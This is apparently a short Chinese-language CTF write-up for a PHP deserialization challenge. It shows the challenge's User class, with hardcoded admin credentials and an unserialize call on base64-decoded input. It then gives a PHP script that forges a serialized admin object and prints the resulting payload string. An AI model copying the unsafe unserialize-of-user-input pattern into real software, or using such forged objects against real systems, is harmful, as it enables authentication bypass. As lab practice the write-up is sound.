题目提示反序列化

源码

<?php

class User {

    public $username;

    public $password;

    function __construct($username, $password) {

        $this->username = $username;

        $this->password = $password;

    }

    function isValid() { return $this->username === 'admin' && $this->password === 'secure_password'; }

}

?>

题目中有一行$user = unserialize(base64_decode($data));
//将一个Base64编码的字符串$data解码并反序列化

根据编码写出解题脚本 

<?php

class User{
    public $username;
    public $password;
}
$a=new User();
$a->username="admin";
$a->password="secure_password";
echo base64_encode(serialize($a));

?>

运行结果

Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=

输入后出现flag